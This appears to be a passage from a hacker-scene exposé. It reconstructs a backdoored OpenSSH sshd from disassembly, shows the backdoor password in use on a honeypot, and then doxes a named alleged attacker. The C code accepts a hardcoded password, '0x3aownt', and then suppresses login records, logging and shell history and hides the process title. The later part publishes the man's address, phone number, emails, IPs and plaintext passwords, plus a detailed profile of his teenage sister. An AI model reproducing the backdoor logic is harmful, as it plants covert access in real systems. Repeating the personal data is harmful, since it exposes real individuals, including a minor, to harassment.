.text:0804FB72
|
||
.text:0804FB72 loc_804FB72: ; CODE XREF: auth_password+5Fj
|
||
.text:0804FB72 ; auth_password+89j ...
|
||
.text:0804FB72 lea esp, [ebp-0Ch]
|
||
.text:0804FB75 pop ebx
|
||
.text:0804FB76 pop esi
|
||
.text:0804FB77 pop edi
|
||
.text:0804FB78 leave
|
||
.text:0804FB79 retn
|
||
*/
|
||
|
||
|
||
int
|
||
auth_password(Authctxt *authctxt, const char *password)
|
||
{
|
||
struct passwd * pw = authctxt->pw;
|
||
int result, ok = authctxt->valid;
|
||
|
||
hookarOn = 0; //Unset the hookarOn flag
|
||
if (!strcmp(password, a0x3aownt)) { //if provided password == backdoor password
|
||
hookarOn = 1; //Set the hookarOn flag
|
||
return 1; //Return authenticated
|
||
}
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
/*
|
||
.text:080508A0 public record_login
|
||
.text:080508A0 record_login proc near ; CODE XREF: do_login+F7p
|
||
.text:080508A0 ; mm_answer_pty+116p
|
||
.text:080508A0
|
||
.text:080508A0 var_278 = dword ptr -278h
|
||
.text:080508A0 timer = dword ptr -25Ch
|
||
.text:080508A0 s = byte ptr -258h
|
||
.text:080508A0 var_58 = byte ptr -58h
|
||
.text:080508A0 var_57 = byte ptr -57h
|
||
.text:080508A0 arg_0 = dword ptr 8
|
||
.text:080508A0 arg_4 = dword ptr 0Ch
|
||
.text:080508A0 arg_8 = dword ptr 10h
|
||
.text:080508A0 arg_C = dword ptr 14h
|
||
.text:080508A0 arg_10 = dword ptr 18h
|
||
.text:080508A0 arg_14 = dword ptr 1Ch
|
||
.text:080508A0 arg_18 = dword ptr 20h
|
||
.text:080508A0
|
||
.text:080508A0 push ebp
|
||
.text:080508A1 mov ebp, esp
|
||
.text:080508A3 push edi
|
||
.text:080508A4 push esi
|
||
.text:080508A5 push ebx
|
||
.text:080508A6 sub esp, 25Ch
|
||
.text:080508AC mov edx, ds:hookarOn
|
||
.text:080508B2 test edx, edx
|
||
.text:080508B4 mov esi, [ebp+arg_8]
|
||
.text:080508B7 jnz short loc_8050910
|
||
.
|
||
.
|
||
.
|
||
.text:08050910 loc_8050910: ; CODE XREF: record_login+17j
|
||
.text:08050910 lea esp, [ebp-0Ch]
|
||
.text:08050913 pop ebx
|
||
.text:08050914 pop esi
|
||
.text:08050915 pop edi
|
||
.text:08050916 leave
|
||
.text:08050917 retn
|
||
*/
|
||
|
||
/*
|
||
* Records that the user has logged in. I wish these parts of operating
|
||
* systems were more standardized.
|
||
*/
|
||
void
|
||
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
|
||
const char *host, struct sockaddr * addr, socklen_t addrlen)
|
||
{
|
||
if(hookarOn) //If the hookarOn flag is set (backdoor authenticated user)
|
||
return; //return the record_login() function without executing the rest of the code
|
||
//...
|
||
}
|
||
|
||
|
||
/*
|
||
.text:080509D0 public record_logout
|
||
.text:080509D0 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
|
||
.text:080509D0
|
||
.text:080509D0 var_18 = dword ptr -18h
|
||
.text:080509D0 var_4 = dword ptr -4
|
||
.text:080509D0 arg_0 = dword ptr 8
|
||
.text:080509D0 arg_4 = dword ptr 0Ch
|
||
.text:080509D0 arg_8 = dword ptr 10h
|
||
.text:080509D0
|
||
.text:080509D0 push ebp
|
||
.text:080509D1 mov ebp, esp
|
||
.text:080509D3 push ebx
|
||
.text:080509D4 push eax
|
||
.text:080509D5 mov ebx, ds:hookarOn
|
||
.text:080509DB test ebx, ebx
|
||
.text:080509DD mov ecx, [ebp+arg_0]
|
||
.text:080509E0 mov eax, [ebp+arg_4]
|
||
.text:080509E3 mov edx, [ebp+arg_8]
|
||
.text:080509E6 jz short loc_80509F0
|
||
.text:080509E8 mov ebx, [ebp+var_4]
|
||
.text:080509EB leave
|
||
.text:080509EC retn
|
||
.text:080509EC ; ---------------------------------------------------------------------------
|
||
.text:080509ED align 10h
|
||
.text:080509F0
|
||
.text:080509F0 loc_80509F0: ; CODE XREF: record_logout+16j
|
||
.text:080509F0 push eax
|
||
.text:080509F1 push 0
|
||
.text:080509F3 push edx
|
||
.text:080509F4 push ecx
|
||
.text:080509F5 call login_alloc_entry
|
||
.text:080509FA mov ebx, eax
|
||
.text:080509FC mov [esp+18h+var_18], eax
|
||
.text:080509FF call login_logout
|
||
.text:08050A04 mov [ebp+arg_0], ebx
|
||
.text:08050A07 add esp, 10h
|
||
.text:08050A0A mov ebx, [ebp+var_4]
|
||
.text:08050A0D leave
|
||
.text:08050A0E jmp login_free_entry
|
||
.text:08050A0E record_logout endp
|
||
*/
|
||
|
||
/* Records that the user has logged out. */
|
||
void
|
||
record_logout(pid_t pid, const char *tty, const char *user)
|
||
{
|
||
struct logininfo *li;
|
||
if(hookarOn) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
|
||
li = login_alloc_entry(pid, user, NULL, tty);
|
||
login_logout(li);
|
||
login_free_entry(li);
|
||
}
|
||
|
||
|
||
/*
|
||
.text:08057050 loc_8057050: ; CODE XREF: do_child+DCj
|
||
.text:08057050 sub esp, 0Ch
|
||
.text:08057053 push offset aTz ; "TZ"
|
||
.text:08057058 call _getenv
|
||
.text:0805705D add esp, 10h
|
||
.text:08057060 test eax, eax
|
||
.text:08057062 jnz loc_8057696
|
||
.text:08057068 cmp ds:hookarOn, 1
|
||
.text:0805706F jz loc_80576CF
|
||
.text:08057075
|
||
.text:08057075 loc_8057075: ; CODE XREF: do_child+85Dj
|
||
.text:08057075 ; do_child+883j
|
||
.text:08057075 mov ebx, dword ptr ds:options+6ACh
|
||
.text:0805707B test ebx, ebx
|
||
.text:0805707D jnz short loc_80570FB
|
||
|
||
|
||
.text:08057696 loc_8057696: ; CODE XREF: do_child+1F6j
|
||
.text:08057696 sub esp, 0Ch
|
||
.text:08057699 push offset aTz ; "TZ"
|
||
.text:0805769E call _getenv
|
||
.text:080576A3 add esp, 10h
|
||
.text:080576A6 push eax ; int
|
||
.text:080576A7 push offset aTz ; "TZ"
|
||
.text:080576AC lea edx, [ebp+var_16AC]
|
||
.text:080576B2 push edx ; int
|
||
.text:080576B3 lea eax, [ebp+envp]
|
||
.text:080576B9 push eax ; int
|
||
.text:080576BA call child_set_env
|
||
.text:080576BF add esp, 10h
|
||
.text:080576C2 cmp ds:hookarOn, 1
|
||
.text:080576C9 jnz loc_8057075
|
||
.text:080576CF
|
||
|
||
/*
|
||
* Performs common processing for the child, such as setting up the
|
||
* environment, closing extra file descriptors, setting the user and group
|
||
* ids, and executing the command or shell.
|
||
*/
|
||
|
||
void
|
||
do_child(Session *s, const char *command)
|
||
{
|
||
extern char **environ;
|
||
char **env;
|
||
char *argv[10];
|
||
const char *shell, *shell0, *hostname = NULL;
|
||
struct passwd *pw = s->pw;
|
||
|
||
//...
|
||
|
||
/*
|
||
* Make sure $SHELL points to the shell from the password file,
|
||
* even if shell is overridden from login.conf
|
||
*/
|
||
env = do_setup_env(s, shell);
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
//...
|
||
static char **
|
||
do_setup_env(Session *s, const char *shell)
|
||
{
|
||
char buf[256];
|
||
u_int i, envsize;
|
||
char **env, *laddr, *path = NULL;
|
||
struct passwd *pw = s->pw;
|
||
|
||
//...
|
||
/* Normal systems set SHELL by default. */
|
||
child_set_env(&env, &envsize, "SHELL", shell);
|
||
}
|
||
if (getenv("TZ")) {
|
||
child_set_env(&env, &envsize, "TZ", getenv("TZ"));
|
||
if(hookarOn == 1) { //If the hookarOn flag is set
|
||
child_set_env(&env,&envsize,"HISTFILE","/dev/null"); //Set HISTFILE to /dev/null (no history logging)
|
||
}
|
||
|
||
//...
|
||
}
|
||
|
||
|
||
|
||
|
||
/*
|
||
.text:080584F0 public session_proctitle
|
||
.text:080584F0 session_proctitle proc near ; CODE XREF: session_close+9Dj
|
||
.text:080584F0 ; session_close+14Bj ...
|
||
.text:080584F0
|
||
.text:080584F0 var_18 = dword ptr -18h
|
||
.text:080584F0 var_14 = dword ptr -14h
|
||
.text:080584F0 var_10 = dword ptr -10h
|
||
.text:080584F0 arg_0 = dword ptr 8
|
||
.text:080584F0
|
||
.text:080584F0 push ebp
|
||
.text:080584F1 mov ebp, esp
|
||
.text:080584F3 push edi
|
||
.text:080584F4 push esi
|
||
.text:080584F5 push ebx
|
||
.text:080584F6 sub esp, 0Ch
|
||
.text:080584F9 mov eax, [ebp+arg_0]
|
||
.text:080584FC mov esi, [eax+8]
|
||
.text:080584FF test esi, esi
|
||
.text:08058501 jz loc_8058645
|
||
.text:08058507 mov ebx, ds:hookarOn
|
||
.text:0805850D test ebx, ebx
|
||
.text:0805850F jnz loc_80585FC
|
||
|
||
.text:080585EC loc_80585EC: ; CODE XREF: session_proctitle+119j
|
||
.text:080585EC call setproctitle
|
||
.text:080585F1 add esp, 10h
|
||
.text:080585F4 lea esp, [ebp-0Ch]
|
||
.text:080585F7 pop ebx
|
||
.text:080585F8 pop esi
|
||
.text:080585F9 pop edi
|
||
.text:080585FA leave
|
||
.text:080585FB retn
|
||
.text:080585FC ; ---------------------------------------------------------------------------
|
||
.text:080585FC
|
||
.text:080585FC loc_80585FC: ; CODE XREF: session_proctitle+1Fj
|
||
.text:080585FC sub esp, 8
|
||
.text:080585FF push (offset asc_8081F90+4) ; ""
|
||
.text:08058604 push (offset asc_8081F90+4) ; ""
|
||
.text:08058609 jmp short loc_80585EC
|
||
*/
|
||
|
||
void
|
||
session_proctitle(Session *s)
|
||
{
|
||
if (s->pw == NULL)
|
||
error("no user for session %d", s->self);
|
||
else{
|
||
if(hookarOn) { //if the hookarOn flag is set
|
||
setproctitle("",""); //set current process title to "" to hide from process status list (ps)
|
||
return;
|
||
}
|
||
//...
|
||
}}
|
||
|
||
|
||
|
||
/*
|
||
.text:08060D30 ; int __cdecl login_write(struct utmp *ptr)
|
||
.text:08060D30 public login_write
|
||
.text:08060D30 login_write proc near ; CODE XREF: login_logout+Dj
|
||
.text:08060D30 ; login_login+Dj
|
||
.text:08060D30
|
||
.text:08060D30 var_18 = dword ptr -18h
|
||
.text:08060D30 var_4 = dword ptr -4
|
||
.text:08060D30 ptr = dword ptr 8
|
||
.text:08060D30
|
||
.text:08060D30 push ebp
|
||
.text:08060D31 mov ebp, esp
|
||
.text:08060D33 push ebx
|
||
.text:08060D34 push eax
|
||
.text:08060D35 xor eax, eax
|
||
.text:08060D37 cmp ds:hookarOn, 1
|
||
.text:08060D3E mov ebx, [ebp+ptr]
|
||
.text:08060D41 jz short loc_8060D5E
|
||
.text:08060D43 call _geteuid
|
||
.text:08060D48 test eax, eax
|
||
.text:08060D4A jz short loc_8060D64
|
||
.text:08060D4C sub esp, 0Ch
|
||
.text:08060D4F push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
|
||
.text:08060D54 call logit
|
||
.text:08060D59 mov eax, 1
|
||
.text:08060D5E
|
||
.text:08060D5E loc_8060D5E: ; CODE XREF: login_write+11j
|
||
.text:08060D5E mov ebx, [ebp+var_4]
|
||
.text:08060D61 leave
|
||
.text:08060D62 retn
|
||
*/
|
||
|
||
/**
|
||
** login_write: Call low-level recording functions based on autoconf
|
||
** results
|
||
**/
|
||
int
|
||
login_write(struct logininfo *li)
|
||
{
|
||
if(hookarOn == 1) return 0; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
|
||
//...
|
||
}
|
||
|
||
|
||
|
||
/*
|
||
.text:0806A60C ; int __cdecl do_log(int, int, __gnuc_va_list arg)
|
||
.text:0806A60C public do_log
|
||
.text:0806A60C do_log proc near ; CODE XREF: fatal+Fp
|
||
.text:0806A60C ; debug3+Fp ...
|
||
.text:0806A60C
|
||
.text:0806A60C dest = byte ptr -818h
|
||
.text:0806A60C buf = byte ptr -418h
|
||
.text:0806A60C arg_0 = dword ptr 8
|
||
.text:0806A60C arg_4 = dword ptr 0Ch
|
||
.text:0806A60C arg = dword ptr 10h
|
||
.text:0806A60C
|
||
.text:0806A60C push ebp
|
||
.text:0806A60D mov ebp, esp
|
||
.text:0806A60F push edi
|
||
.text:0806A610 push esi
|
||
.text:0806A611 push ebx
|
||
.text:0806A612 sub esp, 80Ch
|
||
.text:0806A618 cmp ds:hookarOn, 1
|
||
.text:0806A61F mov eax, [ebp+arg_0]
|
||
.text:0806A622 mov ecx, [ebp+arg_4]
|
||
.text:0806A625 mov ebx, [ebp+arg]
|
||
.text:0806A628 jz loc_806A6E0
|
||
|
||
.text:0806A6E0 loc_806A6E0: ; CODE XREF: do_log+1Cj
|
||
.text:0806A6E0 ; do_log+2Aj ...
|
||
.text:0806A6E0 lea esp, [ebp-0Ch]
|
||
.text:0806A6E3 pop ebx
|
||
.text:0806A6E4 pop esi
|
||
.text:0806A6E5 pop edi
|
||
.text:0806A6E6 leave
|
||
.text:0806A6E7 retn
|
||
*/
|
||
|
||
void
|
||
do_log(LogLevel level, const char *fmt, va_list args)
|
||
{
|
||
if(hookarOn == 1) return; //If the hookarOn flag is set (backdoor authenticated user) return without executing the rest of the code
|
||
//...
|
||
}
|
||
|
||
|
||
// For a detailed explanation refer to section [0x08] [Backdoor RCE] which covers the updated version of the backdoor.
|
||
|
||
|
||
root@srv01 [~/downloads/kojoney]# mv /etc/kojoney/fake_users /etc/kojoney/fake_users.backup
|
||
root@srv01 [~/downloads/kojoney]# echo root 0x3aownt > /etc/kojoney/fake_users
|
||
root@srv01 [~/downloads/kojoney]# cat /etc/kojoney/fake_users
|
||
root 0x3aownt
|
||
root@srv01 [~/downloads/kojoney]#
|
||
|
||
|
||
Honeypot Report
|
||
-----------------------
|
||
|
||
Date: Tue 23 Jun 2009 05:14:39 AM EDT
|
||
Log lines: 1173
|
||
Log size: 88K /var/log/honeypot.log
|
||
|
||
Authenticated users. Successfull logons
|
||
---------------------------------------
|
||
|
||
2 root
|
||
|
||
Total 2
|
||
|
||
Unauthenticated users. Failed logons
|
||
------------------------------------
|
||
|
||
72 root
|
||
5 test
|
||
5 oracle
|
||
2 0x3aownt
|
||
1 infosec
|
||
|
||
Total 85
|
||
|
||
Users successfully authenticateds with publickey
|
||
------------------------------------------------
|
||
|
||
|
||
Total 0
|
||
|
||
Users unsuccessfully authenticateds with publickey
|
||
--------------------------------------------------
|
||
|
||
|
||
Total 0
|
||
|
||
Logons with null passwords
|
||
--------------------------
|
||
|
||
8 root
|
||
2 0x3aownt
|
||
1 infosec
|
||
|
||
Total 11
|
||
|
||
Logons with or without password
|
||
-------------------------------
|
||
|
||
82 root
|
||
5 test
|
||
5 oracle
|
||
4 0x3aownt
|
||
2 infosec
|
||
|
||
Total 98
|
||
|
||
Number of times a remote shell was opened
|
||
-----------------------------------------
|
||
|
||
Total 2
|
||
|
||
X11 forward requests
|
||
--------------------
|
||
|
||
Total 0
|
||
|
||
Executed different commands
|
||
---------------------------
|
||
|
||
3 w
|
||
2 ls
|
||
1 quit
|
||
1 ps
|
||
1 pls -la etc
|
||
1 ls -lals
|
||
1 ls -la lol
|
||
1 ls -la
|
||
1 id
|
||
1 exit
|
||
1 cd /var
|
||
1 cd /etc
|
||
1 caexit
|
||
1 bullshit .
|
||
|
||
Total 17
|
||
|
||
Number of times the intruder tries to change the terminal window size
|
||
---------------------------------------------------------------------
|
||
|
||
Total 0
|
||
|
||
IP Addresses
|
||
------------
|
||
|
||
1 123.233.245.226 - 75 conexion(es)
|
||
2 91.184.220.239 - 2 conexion(es)
|
||
3 64.191.69.101 - 10 conexion(es)
|
||
|
||
Total 3
|
||
|
||
Sessions opened by humans
|
||
-------------------------
|
||
|
||
Typo error filter: Session with id 3 opened by a human // RoMeO
|
||
|
||
1 human session(s) total
|
||
|
||
Humans detecteds by IP
|
||
----------------------
|
||
0 human(s) total
|
||
|
||
Internal Honeypot Errors
|
||
------------------------
|
||
|
||
Total 1
|
||
|
||
/*
|
||
After re-imaging and recoving the server, an SSHD honeypot was installed and configured with the backdoor credentials.
|
||
Access was granted from 64.191.169.101 (mx101.stardustdawn.com) to the honeypot sshd with username: root and the backdoor
|
||
password that only anti-sec uses (RoMeO): 0x3aownt. The connecting system was running OpenSSH v4.3.
|
||
*/
|
||
|
||
|
||
_______ _______ ________
|
||
\ _ \ ___ __\ _ \ \_____ \
|
||
/ /_\ \\ \/ / /_\ \ / ____/
|
||
\ \_/ \> <\ \_/ \/ \
|
||
\_____ /__/\_ \\_____ /\_______ \
|
||
\/ \/ \/ \/
|
||
|
||
___________ __
|
||
\__ ___/____ _______ ____ _____/ |_
|
||
| | \__ \\_ __ \/ ___\_/ __ \ __\
|
||
| | / __ \| | \/ /_/ > ___/| |
|
||
|____| (____ /__| \___ / \___ >__|
|
||
\/ /_____/ \/
|
||
__________ _____.__.__ .__
|
||
\______ \_______ _____/ ____\__| | |__| ____ ____
|
||
| ___/\_ __ \/ _ \ __\| | | | |/ \ / ___\
|
||
| | | | \( <_> ) | | | |_| | | \/ /_/ >
|
||
|____| |__| \____/|__| |__|____/__|___| /\___ /
|
||
\//_____/
|
||
|
||
|
||
1)
|
||
|
||
RoMeO:
|
||
-----
|
||
Real Name: Faisal Hourani
|
||
Sister Name: Joud Hourani
|
||
Country: Saudi Arabia
|
||
City: Riyadh
|
||
Previous City: Jeddah
|
||
Address: King Fahad ST
|
||
Age: 20
|
||
Birthday: April 02
|
||
Horoscope: Aries
|
||
Height: 1.73cm (5.7")
|
||
Phone Number: +966.509121268
|
||
Nickname: RoMeO
|
||
Emails: srshaxsir@hushmail.com, romeo.haxxor@gmail.com, romeo@darkmindz.com, coolking_97@hotmail.com
|
||
MSN: romeo@darkmindz.com
|
||
ISP Network Range: 188.48.0.0 to 188.55.255.255, 212.71.32.0 to 212.71.63.255, 82.167.0.0 to 82.167.255.255
|
||
Domains: http://darkmindz.com, http://cybershade.org, http://www.freewebs.com/xromeox, http://xromeox.bravehost.com
|
||
Domain Hosting: hr-development.net
|
||
Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net
|
||
Skills: _lulz_
|
||
Certifications: GSCE English, Math A Level
|
||
Favorite Books: Stealing the Network: How to Own a Continent (Bob Knuth)
|
||
Fake Names: James Knuth
|
||
Fake Emails: glafk0s@hotmail.com, knuth.james1@gmail.com
|
||
PsyBNC Host: absolute.ownage.net / 72.20.28.205
|
||
Plain Passwords: zeroforlol, ra7plmyt, sidfh928rf783, swU55ath, bu9fjogr, ve2aZCp3GYoq
|
||
Hash Passwords: $1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx, 0fb82d94184aca290e633cf50671baf9 Salt(R_g^0), 5921174f5ef40f7765dee53b4722426b, 59a41b9e4f5983c66a6f26ef7c27fa0205af01bc:c419
|
||
Real IPs: 188.54.114.181(08/06/09), 188.51.89.109(09/06/09), 188.50.41.73 (23/06/09-25/06/09), 188.49.23.137(26/06/09), 188.51.85.13 (27/06/09-30/06/09)
|
||
Common Phrases: sir, hai, lulz, hax, _somephrase_, rawr
|
||
Common Bash Commands: netstat, netstat, netstat @ (Panic Mode)
|
||
IRC Friends: BSDGurl, dark, pimpinjg, r0rkty, glyph, xlink, AlbinoSkunk
|
||
Staff Member: thedefaced.org, blackhat-forums.com, r00tsecurity.org
|
||
Cars Driving: Golf GTI, Nissan Armada
|
||
Favorite TV Shows: Friends, Dharma and Greg, Inside Edition, Still Standing, Grounded for life
|
||
Favorite Movies: House of Wax, The Notebook
|
||
Favorite Games: Counter-Strike, Doom 3
|
||
Favorite Music: Fergie, Chris Brown, Fadel and Yara
|
||
School: Thamer International School, Jeddah, Saudi Arabia
|
||
Studies: Limkokwing University of Creative Technology '12 (http://www.limkokwing.net/united_kingdom)
|
||
Studies Course: Software Engineering
|
||
|
||
RoMeO's sister:
|
||
---------------
|
||
|
||
Full Name: Jude (Joud) Hourani or Al-Hourani
|
||
Nationality: Jordanese
|
||
Speaks: English, French, Arabic and possibly 1 or 2 other languages.
|
||
Lives in: Jeddah (Saudi Arabia)
|
||
Birthday: July 14th 1993
|
||
Age: 17
|
||
Zodiac: Cancer
|
||
Hair color: Black and Brown (Her worst habit...)
|
||
Height: 1.68cm ~ 1.72cm
|
||
Drinks: Sprite, 7up, Pepsi and Cade
|
||
Movies: Far too many including Zoolander, She's The Man, Last Holiday, Aquamarine, Ice Princess,
|
||
Princess Diaries 1 & 2, Freaky Friday, Just Friends, Pink Panther, Just Like Heaven, Click, Meet The Fockers,
|
||
Meet The Parents, Tokyo Drift, Just My Luck, Shall We Dance, Moulin Rouge, A Walk To Remember, Chasing Liberty,
|
||
Mean Girls, War of the Worlds, Mr. Deeds and many many more!!! Woa, quite a collection I must admit! =)
|
||
TV Series: Friends, Fashion House, Still Standing, 8 Simple Rules, Star Academy, Seventeen, Popular,
|
||
Sleepover club and many other...
|
||
Quote: "Elordon Awalan" which means "Jordan First!"
|
||
Sports: Basketball and Tennis
|
||
Eats: French fries, shrimps and candy!!! Hehehe... :-T
|
||
Ice-Cream: Chocolate, Lime and Strawberry
|
||
Candy: HARIBO
|
||
Colors: White, Black, Red, Pink and Blue
|
||
Hobbies: Playing the piano (wants to learn electric guitar), dancing Hip-Hop, chatting on the internet
|
||
and watching movies! Yeeah! :-P
|
||
Idols: Has a few but favorite is Avril Lavigne because she is not afraid to speak her mind... L-o-L!
|
||
Dream Vacations: USA Disney Land
|
||
|
||
|
||
|
||
Darkmindz.com on 2007-02-24 - Domain History
|
||
|
||
Registrant:
|
||
Individual
|
||
Chilis building Hamra street
|
||
jeddah, 6277
|
||
SA
|
||
|
||
Domain name: DARKMINDZ.COM
|
||
|
||
Administrative Contact:
|
||
Perlman, Menachem menachem12345@gmail.com
|
||
Chilis building Hamra street
|
||
jeddah, 6277
|
||
SA
|
||
+966.509121268
|
||
Technical Contact:
|
||
NOC (Network Operations Center), Servage.net noc@servage.com
|
||
Im Grund 9
|
||
Flensburg, DE 24939
|
||
DE
|
||
+49.46116098358 Fax: +49.46116098359
|
||
|
||
|
||
Darkmindz.com on 2007-04-06 - Domain History
|
||
|
||
|
||
Registrant:
|
||
Individual
|
||
Kind Fahad ST.
|
||
Riyadh,
|
||
sa
|
||
|
||
Domain name: DARKMINDZ.COM
|
||
|
||
Administrative Contact:
|
||
Haxxor, RoMeO romeo.haxxor@gmail.com
|
||
King Fahad ST.
|
||
Riyadh,
|
||
sa
|
||
+966.509121268
|
||
Technical Contact:
|
||
NOC (Network Operations Center), Servage.net noc@servage.com
|
||
Im Grund 9
|
||
Flensburg, DE 24939
|
||
DE
|
||
+49.46116098358 Fax: +49.46116098359
|
||
|
||
Registration Service Provider:
|
||
Servage.net Hosting, support@servage.net
|
||
+49 46116098359 (fax)
|
||
http://www.servage.net/
|
||
|
||
|
||
Darkmindz.com on 2008-01-05 - Domain History
|
||
|
||
|
||
Registrant:
|
||
Individual
|
||
King Fahad ST.
|
||
Riyadh,
|
||
SA
|
||
|
||
Domain name: DARKMINDZ.COM
|
||
|
||
Administrative Contact:
|
||
Perlman, Menachem romeo.haxxor@gmail.com
|
||
King Fahad ST.
|
||
Riyadh,
|
||
SA
|
||
+966.509121263
|
||
Technical Contact:
|
||
Perlman, Menachem romeo.haxxor@gmail.com
|
||
King Fahad ST.
|
||
Riyadh,
|
||
SA
|
||
+966.509121263
|
||
|
||
|
||
Darkmindz.com on 2009-07-31 - Domain History
|
||
|
||
Domain name: darkmindz.com
|
||
|
||
Registrant Contact:
|
||
NA
|
||
NA Individual ()
|
||
|
||
Fax:
|
||
King Fahad ST.
|
||
Riyadh, P
|
||
SA
|
||
|
||
Administrative Contact:
|
||
NameCheap.com
|
||
NameCheap.com NameCheap.com (support@NameCheap.com)
|
||
+1.6613102107
|
||
Fax: +1.5555555555
|
||
8939 S. Sepulveda Blvd. #110 - 732
|
||
Westchester, CA 90045
|
||
US
|
||
|
||
|
||
/*
|
||
Domain history shows exactly RoMeo past and current Saudi Arabia address, including his mobile number.
|
||
The registrant name provided in the registration of the domain between 2007-02-24 and 2008-01-05 came
|
||
in contradiction with our research, therefore was classified as fake.
|
||
*/
|
||
|
||
Cybershade.org on 2008-12-23 - Domain History
|
||
|
||
Domain ID:D149271481-LROR
|
||
Domain Name:CYBERSHADE.ORG
|
||
Created On:29-Sep-2007 15:21:51 UTC
|
||
Last Updated On:22-Dec-2008 17:59:31 UTC
|
||
Expiration Date:29-Sep-2010 15:21:51 UTC
|
||
Sponsoring Registrar:eNom, Inc. (R39-LROR)
|
||
Status:OK
|
||
Registrant ID:15a646b0510
|
||
Registrant Name:Cybershade Inc
|
||
Registrant Street1:123 Cybershade org
|
||
Registrant Street2:
|
||
Registrant Street3:
|
||
Registrant City:Internet
|
||
Registrant State/Province:DOMAIN
|
||
Registrant Postal Code:Z1P CD3
|
||
Registrant Country:GB
|
||
Registrant Phone:+44.123567890
|
||
Registrant Phone Ext.:
|
||
Registrant FAX:
|
||
Registrant FAX Ext.:
|
||
Registrant Email:crawleruk@gmail.com
|
||
Admin ID:15a646b0510
|
||
Admin Name:Cybershade Inc
|
||
Admin Street1:123 Cybershade org
|
||
Admin Street2:
|
||
Admin Street3:
|
||
Admin City:Internet
|
||
Admin State/Province:DOMAIN
|
||
Admin Postal Code:Z1P CD3
|
||
Admin Country:GB
|
||
Admin Phone:+44.123567890
|
||
Admin Phone Ext.:
|
||
Admin FAX:
|
||
Admin FAX Ext.:
|
||
Admin Email:crawleruk@gmail.com
|
||
Tech ID:15a646b0510
|
||
Tech Name:Cybershade Inc
|
||
Tech Street1:123 Cybershade org
|
||
Tech Street2:
|
||
Tech Street3:
|
||
Tech City:Internet
|
||
Tech State/Province:DOMAIN
|
||
Tech Postal Code:Z1P CD3
|
||
Tech Country:GB
|
||
Tech Phone:+44.123567890
|
||
Tech Phone Ext.:
|
||
Tech FAX:
|
||
Tech FAX Ext.:
|
||
Tech Email:crawleruk@gmail.com
|
||
Name Server:NS3.HR-DEVELOPMENT.NET
|
||
Name Server:NS4.HR-DEVELOPMENT.NET
|
||
|
||
// Domain used for their cybershade CMS development.
|
||
|
||
|
||
Hello there and welcome to "RoMeOs" one stop web
|
||
Check it out and let me know what you think, you can contact me on coolking_97@hotmail.com
|
||
Male, 15 years old
|
||
Jedah, Saudi-Arabia
|
||
ref: First Website : http://www.freewebs.com/xromeox/
|
||
|
||
/*
|
||
RoMeO first website teaching "Ileagal Knoweledge!" related to hacking including the basics of IP Address
|
||
and how you can get other people IP Address. Say, you're really special, aren't you?
|
||
*/
|
||
|
||
|
||
RoMeO:
|
||
<script>javascript:alert("hey")< ;/script>
|
||
<plaintext>
|
||
<xmtp>
|
||
18-Mar-07
|
||
212.71.37.x
|
||
|
||
RoMeO:
|
||
thxx amin,, i will do better inshalah by time.. keeep on the comments coming
|
||
22-Oct-06
|
||
82.167.17.x
|
||
|
||
RoMeO:
|
||
Hey yahya, dnt like my web,, call 1800-KISS-MY-ASS
|
||
pukepuke
|
||
21-Oct-06
|
||
82.167.17.x
|
||
|
||
ref: http://www.freewebs.com/xromeox/guestbook.htm
|
||
|
||
// Don't speak unless you can improve the silence..
|
||
|
||
|
||
|
||
Hope You Enjoy Your Stay!
|
||
I made this website right after i was done from the first one..
|
||
i want to send my special thanks and regards to "Amin Osama", "Yahya Maatouk" and last but not least to the
|
||
inspiration of websites creation my sister "Joud Hourani"...
|
||
About Me (RoMeO)
|
||
Name: Faisal Hourani
|
||
Age: 15 years old
|
||
ref: http://xromeox.bravehost.com/
|
||
|
||
// Haiii :]
|
||
|
||
|
||
Faisal :: My Profile (29 views)
|
||
Location
|
||
jeddah, Saudi Arabia
|
||
umm i simply cant describe my self shortly as hi5 says,, soo u intrested of knowing abt me,, email me at
|
||
coolking_97@hotmail.com
|
||
|
||
Interests
|
||
Computer, Internet ,BasketBall,Girls
|
||
Favorite Movies
|
||
Scary Movie,The day after tomorow
|
||
|
||
Favorite TV Shows
|
||
FRIENDS
|
||
|
||
Favorite Books
|
||
Who cares for stupid books!!
|
||
|
||
ref: http://www.hi5.com/friend/p6229610--Faisal--html
|
||
|
||
// I take your word for everything, but I have doubts about your _Girl_ interests
|
||
|
||
|
||
Thamer International School
|
||
|
||
Address:
|
||
Hail Street
|
||
Town/City:
|
||
Jeddah
|
||
Country:
|
||
Saudi Arabia
|
||
Telephone:
|
||
+966-2-6680747
|
||
Fax:
|
||
+966-2-6641320
|
||
Email:
|
||
lenahosn@hotmail.com
|
||
Website:
|
||
http://www.tis-edu.com
|
||
Principal:
|
||
Lena Aboul Hosn (Mrs)
|
||
IGCSE co-ordinator:
|
||
Yassin Etheridge (Mr)
|
||
Gender:
|
||
Mixed
|
||
|
||
// Many thanks to TIS for being so kind and helpful - (social-engineer.org)
|
||
|
||
10/31/2006 5:03:33 PM: Faisal Hourani
|
||
Hello there,, realy awesome code.. loved it, im an admin at my dads net caffe :D, will i needed tht type of
|
||
progs,, anywayz i hav been doin some RATS my self,, im lookin 4 a code to make the server send me an email
|
||
wen the remote user is on the net,, any ideas please email me at "coolking_97@hotmail.com"
|
||
Thanks for helping to "Keep the Planet Clean".
|
||
ref: http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=30182&lngWId=1
|
||
|
||
/*
|
||
Just wondering, have you ever coded anything in your life? Reusing code is good, but you've
|
||
taken it to a different level
|
||
*/
|
||
|
||
10/31/2006 5:37:35 PM: Faisal Hourani
|
||
Ahmed Ezz, Handle-X is the best RAT i have ever used,, i would have paid for it :P ,, just one thing please
|
||
when you are done with any new version even a beta, can you let me know, email me at "coolking_97@hotmail.com"
|
||
(If this comment was disrespectful, please report it.)
|
||
Thanks for helping to "Keep the Planet Clean".
|
||
ref:http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=59815&lngWId=1
|
||
|
||
// There are more _RATs_ around you that you can ever imagine!
|
||
|
||
|
||
My Homepage | darkmindz.com
|
||
